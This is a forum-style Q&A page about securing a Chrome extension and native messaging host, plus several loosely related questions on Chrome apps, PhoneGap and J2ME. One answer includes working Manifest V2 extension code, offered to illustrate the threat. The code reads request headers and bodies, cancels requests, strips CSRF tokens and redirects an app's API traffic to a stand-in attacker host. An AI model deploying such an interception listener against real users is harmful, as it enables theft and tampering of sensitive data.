Chrome extension security - security

I am developing a GWT-based client/server web application.
The application installs a web site on IIS.
When clients first browse to the web site, they need to run a local installation, which installs a local process and an NPAPI plugin on the client computer.
The client runs in browsers such as IE, Chrome and Firefox, and uses the NPAPI plugin to send messages to the local process.
The local process is used for accessing the file system, registry, etc.
In order to prevent other web sites from using the NPAPI plugin, when a user first logs in, the server sends him a hash of a string which contains the URL of the site plus some other data.
The NPAPI plugin has access to the current URL of the browser, and also creates the same hash and compares the two.
Due to Chrome's upcoming end of support for NPAPI plugins, I am trying to replace the plugin with a Chrome extension and a native messaging host.
The extension can't be limited to a certain domain because it can be used from many domains.
I am trying to figure out a way to prevent other web sites from using the extension to send messages to the native host, but can't find a way to do it.
Does anyone have an idea how I can accomplish that?
Any advice would be greatly appreciated, thanks.

Have you considered having the extension be limited to a specific domain, and then having the other domains iframe that domain and communicate via postMessage? You could have a whitelist of domains in the JS of the iframe, and validate the message origin against that list.
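As an added example of the bridge pattern the answer describes (this is not code from the original question or answer): the script that would run in the iframe hosted on the one domain the extension is restricted to. It validates `event.origin` against an allowlist by exact origin match, accepts only a fixed set of commands, and relays them to the extension. The allowlisted origins, the command names, the `forward` callback and the extension ID are constructed placeholders for this example.

```javascript
'use strict';

// Allowlist of embedding sites as full origins (scheme + host + port), so a
// lookalike such as https://app1.example.com.evil.net cannot match by
// substring. Constructed values for this example.
const BRIDGE_ALLOWED_ORIGINS = new Set([
  'https://app1.example.com',
  'https://app2.example.com:8443',
]);

// Commands the bridge is willing to relay to the extension (and from there to
// the native messaging host). Anything else is dropped, so even an
// allowlisted embedder cannot ask the host for arbitrary actions.
const ALLOWED_COMMANDS = new Set(['readConfig', 'listFiles']);

// Exact-match origin check. Rejects non-strings, the literal "null" origin
// (sandboxed iframes, file://), non-https origins and unparsable values.
// Parsing with URL normalises host case and drops default ports before the
// comparison, so https://APP1.example.com:443 equals https://app1.example.com.
function isAllowedOrigin(origin) {
  if (typeof origin !== 'string' || origin === 'null') return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== 'https:') return false;
  return BRIDGE_ALLOWED_ORIGINS.has(parsed.origin);
}

// Shape check on event.data: copy only the known fields into a fresh object
// so nothing else the embedder attached reaches the extension.
function validateBridgeMessage(data) {
  if (!data || typeof data !== 'object') return null;
  if (typeof data.cmd !== 'string' || !ALLOWED_COMMANDS.has(data.cmd)) return null;
  if (data.args !== undefined && !Array.isArray(data.args)) return null;
  return { cmd: data.cmd, args: data.args === undefined ? [] : data.args.slice() };
}

// Builds the "message" handler. forward(msg, reply) is injected so the
// decision logic can be exercised without a browser; in the real bridge it is
// chrome.runtime.sendMessage(EXTENSION_ID, msg, reply). The return value is
// only for callers/tests; the browser ignores it.
function makeBridgeHandler(forward) {
  return function onMessage(event) {
    if (!isAllowedOrigin(event.origin)) return { forwarded: false, reason: 'origin' };
    const msg = validateBridgeMessage(event.data);
    if (!msg) return { forwarded: false, reason: 'message' };
    forward(msg, (reply) => {
      // Answer the frame that asked, pinned to its exact origin, never '*'.
      event.source.postMessage({ id: event.data.id, reply }, event.origin);
    });
    return { forwarded: true };
  };
}

// Browser-only wiring for the bridge page. EXTENSION_ID is a placeholder;
// the extension's manifest must list the bridge origin under
// externally_connectable.matches for sendMessage from a web page to work.
if (typeof window !== 'undefined' && typeof chrome !== 'undefined' && chrome.runtime) {
  const EXTENSION_ID = 'replace-with-the-installed-extension-id';
  window.addEventListener('message', makeBridgeHandler((msg, reply) => {
    chrome.runtime.sendMessage(EXTENSION_ID, msg, reply);
  }));
}
```

An embedding site would call `bridgeFrame.contentWindow.postMessage({ id: 1, cmd: 'listFiles', args: ['/tmp'] }, 'https://bridge.example.com')` with the bridge origin as the target, not `'*'`. The real boundary is the manifest's `externally_connectable.matches` entry, which is what stops any other site from reaching the extension directly; the origin check in the iframe is the second layer, and the extension's `chrome.runtime.onMessageExternal` listener should still verify `sender.url` before talking to the native host.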

Related

Do Chrome extensions have access to Chrome apps?

For security considerations I am wondering if Chrome extensions have access to an app. I am designing a Chrome App which handles sensitive data. As far as I understand it, that app runs in a sandboxed environment which should be fairly isolated. If a user had by mistake installed a malicious Chrome extension, would that extension be able to intercept/modify any of the sensitive data in the app?
Please note that I do not consider other ways of interception outside of the Chrome environment, e.g. some virus that gives someone root access or the like. I would just like to understand to what degree a Chrome app is more susceptible to interception than a standard stand-alone application.
Sebastian
On one hand, extensions cannot touch your app's windows (as in, inspection / script injection) in the default environment, even with the "debugger" permission. Your "local" data should be safe.
On the other, I tested it and conclude that the webRequest API will catch all XHRs you send.
This includes headers for both request and response, and the request body. The response body is currently not available for inspection; however, a malicious extension can perform a redirect, modify your request or cancel it.
This was deemed a security issue; as of Chrome 45, extensions can no longer intercept traffic from other extensions and apps. Hosted apps were accidentally included too, but that is a bug that will be fixed soon; traffic from hosted apps will be open to webRequest as normal.
I don't know of any other possibility for an extension to snoop on an app (without any anomalous chrome://flags configuration).
Extensions or other apps cannot access data inside other extensions or apps. An exception may be data in the syncFileSystem api, since an extension could be granted access to the user's Gdrive.
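To make concrete what the answer says a malicious extension could do with the webRequest API (read request headers and body, redirect, modify or cancel), here is an added example that is not part of the original answer: the listener such an extension would register, with the decision logic kept as pure functions so it runs outside the browser as well. `TARGET_ORIGIN`, `ATTACKER_ORIGIN` and the sample request details are constructed placeholders.

```javascript
'use strict';

// Constructed origins for this example: the app whose API traffic the
// listener targets, and the host it redirects that traffic to.
const TARGET_ORIGIN = 'https://api.victim-app.example';
const ATTACKER_ORIGIN = 'https://collector.attacker.example';

// What onBeforeRequest / onBeforeSendHeaders hand to a listener: the URL,
// method, request headers and, when 'requestBody' is in extraInfoSpec, the
// raw POST body as ArrayBuffer chunks. There is no response body, which is
// exactly the limit the answer describes.
function summarizeRequest(details) {
  const headers = {};
  for (const h of details.requestHeaders || []) headers[h.name.toLowerCase()] = h.value;
  let body = null;
  if (details.requestBody && Array.isArray(details.requestBody.raw)) {
    const dec = new TextDecoder();
    body = details.requestBody.raw.map((p) => dec.decode(new Uint8Array(p.bytes))).join('');
  }
  return { url: details.url, method: details.method, headers, body };
}

// Blocking decision for onBeforeRequest. The object returned is the
// BlockingResponse: {} lets the request through, {cancel: true} drops it and
// {redirectUrl} sends the browser elsewhere before anything leaves the machine.
function decide(details) {
  if (!details.url.startsWith(TARGET_ORIGIN + '/')) return {};
  if (details.method === 'DELETE') return { cancel: true };
  return { redirectUrl: ATTACKER_ORIGIN + details.url.slice(TARGET_ORIGIN.length) };
}

// Blocking response for onBeforeSendHeaders: the header list returned replaces
// the one the browser was about to send, so dropping an entry removes it.
function stripHeader(details, name) {
  const lower = name.toLowerCase();
  const requestHeaders = (details.requestHeaders || []).filter((h) => h.name.toLowerCase() !== lower);
  return { requestHeaders };
}

// Registration runs only inside an extension. The (Manifest V2) manifest needs
// the "webRequest" and "webRequestBlocking" permissions plus a host permission
// covering TARGET_ORIGIN.
if (typeof chrome !== 'undefined' && chrome.webRequest) {
  const filter = { urls: [TARGET_ORIGIN + '/*'] };
  chrome.webRequest.onBeforeRequest.addListener(
    (details) => { console.log(summarizeRequest(details)); return decide(details); },
    filter, ['blocking', 'requestBody']);
  chrome.webRequest.onBeforeSendHeaders.addListener(
    (details) => stripHeader(details, 'X-CSRF-Token'),
    filter, ['blocking', 'requestHeaders']);
}
```

Blocking listeners of this kind belong to Manifest V2; under Manifest V3 ordinary extensions get only the observing form of webRequest and must use declarativeNetRequest for redirects and cancellation, which narrows but does not remove the interception surface.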

Native Mobile App Secure Bridge to Hosted Content

I would greatly appreciate some help with the following problem.
I am attempting to build an app with HTML/CSS/JQM that I plan to wrap with PhoneGap to package as a native app for deployment on Android & iOS Platforms.
The app will be basically a form for users to input information which upon submit will be posted to an email using PHP on our web server. It is of the utmost importance that the information is encrypted between the user device and our web server.
I have planned to do this by having a single terms & conditions page packaged with the native app, with the 'accept' button loading the 'form' page on the web server.
I would like to make it impossible to access the hosted 'form' page via a web browser (i.e. the only way to access the page is via the native app).
What I would like to do is to have the native app automatically log in to the web server, so that the user does not have to go through a registration process.
I have considered using Wordpress, Drupal or Joomla as a solution but as there will only ever be a single html page, jquery, jqm and php form submission scripts on the server - this seems overcomplicated.
It is very important that the hosted files cannot be hacked, as the user information being submitted is of a sensitive nature (e.g. financial information). Also, the connection between the native app and the host server must use SSL.
Would a .htaccess / .htpasswd restriction be the best way to go about this?
Any advice would be greatly appreciated, thanks.

Embedded bookmark in J2ME app

Does anyone know if this is possible in J2ME:
I want to have an app that simply launches a browser when opened and directs the browser to a specific web page.
If so, is it widely supported?
You can use javax.microedition.midlet.MIDlet.platformRequest() to launch the browser on almost all phones that support Java ME. This article tells more about invoking platform services such as the browser.

I'm really confused about Chrome Extension+Google API

I'm really confused. I want to make a Chrome Extension that can update a user's Google Calendar; what kind of program should I register under Google API?
Is it a Web App? But I don't plan to have a server to host anything, because Chrome Extensions are in the browser itself.
I really don't think it's a service account, but if it is, somebody enlighten me!
So that leaves installed applications?
Well, Chrome Extensions and Google APIs are very different in nature, and they don't have a special way to communicate with each other.
Chrome Extensions are JavaScript code running in the browser, allowed by a Chrome user, with more rights than a normal page; while Google APIs are accessed by server code, just as Google Apps Script (JavaScript code running on a Google server with some Google user's rights).

App for Google Chrome

I have created an App for Google Chrome which just opens a web page. I am new to the topic of Apps. I was wondering if it is possible to execute some Linux command by using an App in Google Chrome, for instance an App which can open a terminal or open a program installed on my machine like Gimp, Kate, LibreOffice...
From the instructions on Google's web page I saw that the only actions for an App are limited to opening a web address, but I don't know if it is possible to extend the capabilities of the Apps.
Regards.
Aren't apps sandboxed into the Google Chrome process, to ensure they can't affect other processes and for other security reasons? If so, you won't be able to execute programs/commands or view the user's files unless you use some workaround such as Google's Native Client.
Google has locked down capabilities to stop malicious Web Apps from executing code and bringing in malware and exploits.
You can write an NPAPI plugin or a custom URI scheme associated with a Unix terminal.
